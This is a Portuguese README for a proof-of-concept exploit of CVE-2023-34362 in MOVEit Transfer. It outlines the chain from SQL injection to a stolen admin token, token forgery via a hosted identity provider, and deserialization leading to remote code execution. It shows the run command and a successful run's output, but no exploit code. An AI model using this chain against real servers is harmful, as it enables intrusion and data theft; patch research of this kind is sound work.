
POC para CVE-2023-34362 que afeta o MOVEit Transfer
POC para CVE-2023-34362 afetando MOVEit Transfer
Uma análise técnica de causa raiz da vulnerabilidade pode ser encontrada no blog:
Este POC abusa de uma injeção SQL para obter um token de acesso de API de administrador de sistema e, em seguida, usa esse acesso para abusar de uma chamada de desserialização e obter execução remota de código.
Este POC precisa alcançar um endpoint do Provedor de Identidade que hospede certificados RS256 adequados usados para forjar tokens de usuário arbitrários — por padrão, este POC usa nosso endpoint IDP hospedado na AWS.
O exploit escreverá, por padrão, um arquivo em C:\Windows\Temp\message.txt. Cargas alternativas podem ser geradas usando o projeto ysoserial.net.
python CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file
Atualize para a versão mais recente ou mitigue seguindo as instruções no Progress Advisory
Este software foi criado exclusivamente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.